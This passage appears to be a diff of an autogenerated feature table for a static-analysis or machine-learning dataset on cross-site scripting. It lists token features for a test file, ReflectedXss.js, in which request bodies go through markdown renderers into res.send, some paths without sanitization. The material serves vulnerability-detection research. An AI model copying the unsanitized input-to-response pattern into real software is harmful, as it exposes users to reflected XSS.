rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:64 | remark( ... oString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:64 | remark( ... oString | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:64 | remark( ... oString | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:64 | remark( ... oString | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:64 | remark( ... oString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | exceptional return of remark( ... tring() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | exceptional return of remark( ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | exceptional return of remark( ... tring() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | exceptional return of remark( ... tring() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | exceptional return of remark( ... tring() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19928,6 +133767,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:12:70:66 | remark( ... tring() | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:21:70:23 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:21:70:23 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:21:70:23 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:21:70:23 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:21:70:23 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | CalleeFlexibleAccessPath | remark().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | calleeImports | remark | @@ -19936,6 +133780,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:25:70:32 | sanitize | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:35:70:45 | processSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:35:70:45 | processSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:35:70:45 | processSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:35:70:45 | processSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:35:70:45 | processSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:49 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:49 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:49 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:49 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:49 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | CalleeFlexibleAccessPath | remark().use().processSync | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | calleeImports | remark | @@ -19944,6 +133798,86 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:47:70:54 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:51:70:54 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:51:70:54 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:51:70:54 | body | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:51:70:54 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:51:70:54 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:57:70:64 | toString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:57:70:64 | toString | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:57:70:64 | toString | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:57:70:64 | toString | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:70:57:70:64 | toString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:5 | res | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:10 | res.send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | exceptional return of res.sen ... String) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | exceptional return of res.sen ... String) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | exceptional return of res.sen ... String) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | exceptional return of res.sen ... String) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | exceptional return of res.sen ... String) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | res.sen ... String) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | res.sen ... String) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | res.sen ... String) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | res.sen ... String) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:3:72:66 | res.sen ... String) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:7:72:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:7:72:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:7:72:10 | send | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:7:72:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:7:72:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:18 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:18 | unified | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:18 | unified | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:18 | unified | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:18 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | exceptional return of unified() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | exceptional return of unified() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | exceptional return of unified() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | exceptional return of unified() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | exceptional return of unified() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | unified() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | unified() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | unified() | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | unified() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:20 | unified() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:24 | unified().use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:24 | unified().use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:24 | unified().use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:24 | unified().use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:24 | unified().use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | exceptional return of unified ... rkdown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | exceptional return of unified ... rkdown) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | exceptional return of unified ... rkdown) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | exceptional return of unified ... rkdown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | exceptional return of unified ... rkdown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | unified ... rkdown) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | unified ... rkdown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | unified ... rkdown) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | unified ... rkdown) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:34 | unified ... rkdown) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:46 | unified ... essSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:46 | unified ... essSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:46 | unified ... essSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:46 | unified ... essSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:46 | unified ... essSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | exceptional return of unified ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | exceptional return of unified ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | exceptional return of unified ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | exceptional return of unified ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | exceptional return of unified ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | unified ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | unified ... q.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | unified ... q.body) | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | unified ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:56 | unified ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19952,6 +133886,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:12:72:65 | unified ... oString | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:22:72:24 | use | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:22:72:24 | use | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:22:72:24 | use | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:22:72:24 | use | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:22:72:24 | use | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | CalleeFlexibleAccessPath | unified().use | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | calleeImports | unified | @@ -19960,6 +133899,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:26:72:33 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:36:72:46 | processSync | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:36:72:46 | processSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:36:72:46 | processSync | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown processSync req body toString remark process req body e f res send f | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:36:72:46 | processSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:36:72:46 | processSync | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:50 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:50 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:72:48:72:50 | req | enclosingFunctionBody | req res res send req body unified use markdown use remark2rehype use doc title \ud83d\udc4b\ud83c\udf0d use format use html process req body err file res send file res send remark processSync req body toString res send remark use sanitize processSync req body toString res send unified use markdown 